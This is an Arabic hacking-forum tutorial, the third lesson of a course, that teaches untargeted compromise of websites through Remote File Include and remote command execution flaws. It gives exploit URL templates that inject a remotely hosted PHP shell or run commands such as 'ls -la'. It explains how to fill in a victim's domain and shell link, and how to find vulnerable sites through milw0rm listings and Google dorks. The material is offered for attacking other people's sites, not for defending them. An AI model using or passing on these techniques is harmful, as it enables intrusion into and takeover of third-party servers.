الدرس الثالث: البحث عن الثغرات ورفع الشيل

[ASDELY-ScOrPiOn]

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

تحدثنا في الدروس السابقة عن مفاهيم أختراق المواقع وعن أوامر الينكس

وسيكون درسنا الثالث:

البحث عن الثغرات الجديده ورفع الشل (الأختراق العشوائي)

بداية درسنا هذا ندخل في الجد لتطبيق ماتعلمناه في الدرسين السابقه وبالأخص تطبيق الأوامر
لتطبيق الأوامر الي تعلمتها تحتاج شل .. والشل لابد تزرعة على موقع عن طريق ثغرات الريموت وهي
Remote File Include
commands execution
وهذي النوعية من الثغرات خــطــيرة جداً
والسبب انها تنفذ اوامر على السيرفر وممكن تسيطر على الموقع بشكل كامل
طبعاً يوجد ثغرات اخرى للمواقع لاكن ليست بمستوى هالنوعيه وباقي الثغرات اقل خطوره

نوضح طريقه عمل نوعية الثغرتين مع تطبيق عملي تجربة بنفسك

((Remote File Include))
طريقه عمل هذي الثغرات هي ربط الشل مع الموقع وهي اكثر الثغرات انتشار الأن
مثال على شكل استثمار الثغرة
[لا يمكن مشاهدة الروابط إلا بعد التسجيل وتفعيل العضوية. ]?
-| نفصل الرابط |-
موقع الضحية: [لا يمكن مشاهدة الروابط إلا بعد التسجيل وتفعيل العضوية. ]
الملف المصاب بالثغرة: index.php?asdely=
ملف الشل: [لا يمكن مشاهدة الروابط إلا بعد التسجيل وتفعيل العضوية. ]
وبعد التنفيذ اذا الثغرة موجوده والموقع مصاب بها راح تشوف عرض لك الشل .. وهنا يجي وقت تنفيذ الأوامر
ومثل ماتشوف ان رابط الشل جا بعد علامة " = "
ايضاً لابد ان يكون الشل بأمتداد .txt يعني ملف نصي وبعد رابط الشل تضع علامة استفهام " ? "

اما النوعية الثانية
((Remote commands execution))
طريقة عمل هذه النوعية من الثغرات هي تنفيذ الأوامر على طول بدون ماتحط رابط الشل
مثال على شكل استثمار الثغرة
www.google.com/index.php?cmd=ls -la
-| نفصل الرابط |-
موقع الضحية: [لا يمكن مشاهدة الروابط إلا بعد التسجيل وتفعيل العضوية. ]
الملف المصاب بالثغرة: index.php?cmd=
احد اوامر الينكس: ls -la
وبعد التنفيذ اذا الثغرة موجودة فعلاً راح تشوفه يعرض لك في المتصفح نتيجه الأمر المنفذ
ولو نفذت مثلاً امر ls -la راح يعرض لك الملفات والمجلدات والتصاريح في المتصفح وبشكل غير مرتب يصعب التفرقه بين الملفات والمجلدات
ولعرضها بشكل مرتب مثلاً في متصفح الأكسبلور .. من الأعلى تضغط على "عرض" ثم تختار من القائمة "المصدر" وراح يعرض لك نتيجه الأمر في ملف نصي وبيكون بشكل مرتب
[ثغرة للتطبيق]
تم إزالة التطبيق بسبب أحد الأطفال
طبعاً مكان id مثل ماقلنا نكتب الأوامر
يوجد شرح سريع بالفديو في المرفقات بأسم (r-c-e)

بعد ماعرفنا طريقه عمل ثغرات الريموت
ننتقل الى كيفية ايجاد الثغرات الجديدة بأستخدام موقع milw0rm
رابط الموقع
http://www.milw0rm.com/
من هذا الموقع راح نتابع احدث ثغرات المواقع
بعد الدخول الى الموقع شاهد الصوره لمعرفة كيفية إيجاد ثغرات المواقع

[لا يمكن مشاهدة الروابط إلا بعد التسجيل وتفعيل العضوية. ]

مثال على ثغرة فايل انكلود "Remote File Include" من موقع milw0rm
Exhibit Engine <= 1.22 (styles.php) Remote File Include Vulnerability
-| تفصيل العنوان |-
اسم السكربت: Exhibit Engin
اصدار السكربت: 1.22
الملف المصاب بالثغرة: styles.php
نوع الثغرة: Remote File Include

طبعاً لمشاهدة الأستثمار للثغرة تضغط على عنوانها وراح تفتح لك صفحة ثانية فيها كود الثغرة وأسم المكتشف ...الخ والي يهمنا هو "استثمار الثغرة"
ويوجد بداخل الصفحة مصطلحات بسيطة وتختلف من ثغرة الى اخرى
وسنقوم بتوضيحها بالتفصيل ان شاء الله

المصطلحات التي تدل على استثمار الثغرة
Example:
Expl:
Exploit:
Exploits:
وجميع هذي المصطلحات تعني الأستثمار وتجد اسفلها او بجانبها شكل الأستثمار للثغرة
مثال على احد المصطلحات:
http://www.milw0rm.com/exploits/2850
يوجد بالأسفل
Expl:
http://www.site.com/[ee_path]/styles.php?toroot=[evil_scripts]
اذاً على طول نفهم ان الأستثمار للثغرة هو:
http://www.site.com/[ee_path]/styles.php?toroot=[evil_scripts]
وطبعاً الأستثمار لابد نعدل عليه بعض الأشياء مثل اسم الموقع نغيره الى الموقع الي لقينا فيه الثغرة وايضاً اسم مجلد السكربت ورابط الشل

ويوجد مصطلحات للأستثمار نفسه ولابد نعرفها عشان نعرف كيف نعدل الأستثمار وراح أقسمها الى مجموعات:

المجموعة الأولى
http://www.site.com/
[target]
[site]
[namesite]
[url]
- جميعها تدل على عنوان موقع الضحية -
مثال على أحد مصطلحات عنوان الموقع:
Example: http://[site]/modules/NukeAI/util.php?AIbasedir=[php shell]
المصطلح المكتوب في الأستثمار هو [site] ومثل ماذكرنا انها تدل على عنوان موقع الضحيه
نفرض ان الموقع المستهدف هو [لا يمكن مشاهدة الروابط إلا بعد التسجيل وتفعيل العضوية. ] راح يكون التعديل على الأستثمار بهذا الشكل
[لا يمكن مشاهدة الروابط إلا بعد التسجيل وتفعيل العضوية. ][php shell]

المجموعة الثانية
/[scripts]/
/[path]/
/[dir]/
/[folder]/
طبعاً ممكن تحدث بعض التغيرات مثلاً يكون شكل المصطلح /[path_asdely]/ مب شرط يكون مطابق لما ذكر
- جميعها تدل على اسم مجلد السكربت المصاب بالثغرة -
مثال على أحد مصطلحات أسم مجلد السكربت المصاب:
http://[target]/[path]/includes/profile.php?GlobalSettings[templatesDirectory]=evill
المصطلح كما هو في الأستثمار [path] وهذا المصطلح من ضمن مصطلحات اسم مجلد السكربت المصاب بالثغرة
نفترض ان اسم مجلد السكربت المصاب هو asdely وعنوان الموقع المستهدف هو [لا يمكن مشاهدة الروابط إلا بعد التسجيل وتفعيل العضوية. ]
يكون شكل الأستثمار بعد التعديل:
[لا يمكن مشاهدة الروابط إلا بعد التسجيل وتفعيل العضوية. ][templatesDirectory]=evill
ومن المعروف ان الأسم الذي يكون بين علامتين السلاش "/ /" في الرابط معناته مجلد

المجموعة الثالثة
[SHELLURL]
[evil]
[shell]
[yourevil]
[evil_scripts]
[cmd]
[php shell]
- جميعها تدل على رابط الشل -
دائماً تجد هذه المصطلحات في أخر الأستثمار
مثال على أحد مصطلحات رابط الشل:
http://www.site.com/[ee_path]/styles.php?toroot=[evil_scripts]
نفترض أن عنوان الموقع المستهدف هو [لا يمكن مشاهدة الروابط إلا بعد التسجيل وتفعيل العضوية. ] واسم مجلد السكربت المصاب alkaser وعنوان الشل [لا يمكن مشاهدة الروابط إلا بعد التسجيل وتفعيل العضوية. ]?
يكون شكل الأستثمار بعد التعديل:
[لا يمكن مشاهدة الروابط إلا بعد التسجيل وتفعيل العضوية. ]?
الأن الأستثمار عدل عليه بشكل كامل وهو جاهز للأستعراض
طبعاً الشل مثل ماذكرنا يكون بأمتداد txt وانت تقوم برفعه على اي مساحة او مركز تحميل يسمح بالأمتداد txt ثم تستخدمة في الأستثمارات بشكل دائم

المطلوب فعله مع جميع استثمارات ثغرات فايل انكلود:
1- عنوان الموقع المستهدف
2- اسم مجلد السكربت المصاب
3- رابط الشل بأمتداد txt
بعد توفر هذي الثلاث اشياء تقوم بالتعديل على الأستثمار ثم تستعرضه في المتصفح
ان عرض لك الشل معناته السكربت مصاب والمطلوب منك تنفيذ الأوامر
وان لم يعرض لك الشل معناته السكربت تم ترقيعه من الثغره وهو غير مصاب
ايضاً ممكن يعرض لك الشل اليوم تجي بكره تبي تسوي شي او تنفذ كم امر تستعرض الرابط وتلقاه ماعرض لك الشل
مع انه في الأمس كان شغال الشل .. على طول تعرف ان السكربت تم ترقيع الثغره الي فيه

طبعاً جميع كلامنا السابق المقصود به هو ثغرات Remote File Include لأن مثل ماذكرت بأول الموضوع انها منتشره وبشكل كبير
أما Remote commands execution قليله ثغراتها

وطريقة البحث عن السكربت المصاب تكون بنسخ اسم السكربت ثم البحث عنه في قوقل او اي محرك بحث أخر
نفترض اننا نبي نبحث عن هذي الثغرة
Messagerie Locale (centre.php) Remote File Inclusion Vulnerability
نقوم بنسخ اسم السكربت وهو Messagerie ولصقه في محرك البحث قوقل ثم تقوم بتجهيز الأستثمار والتجربة في النتايج الي طلعها لك محرك البحث
ايضاً يوجد بعض الثغرات موفر لنا طريقة البحث عن الثغرة
وفي الغالب تكون امام هذا المصطلح (( Dork : ))
مثال على المصطلح:
http://www.milw0rm.com/exploits/2832
وهذا المصطلح وكلمة البحث تبع السكربت المصاب
Dork : inurl:indexmess.php
كل الي عليك تنسخ inurl:indexmess.php وتلصقه في محرك البحث قوقل ثم تقوم بالبحث
وللمعلومية هذي الثغرة هي نفسها
Messagerie Locale (centre.php) Remote File Inclusion Vulnerability
بأمكانك البحث عن اسم السكربت: Messagerie او اسم البحث الجاهز: inurl:indexmess.php

تحياتي للجميع
وللدورة تكملة
ملاحظة: صور الدرس في المرفقات لكيلا تضيع الصور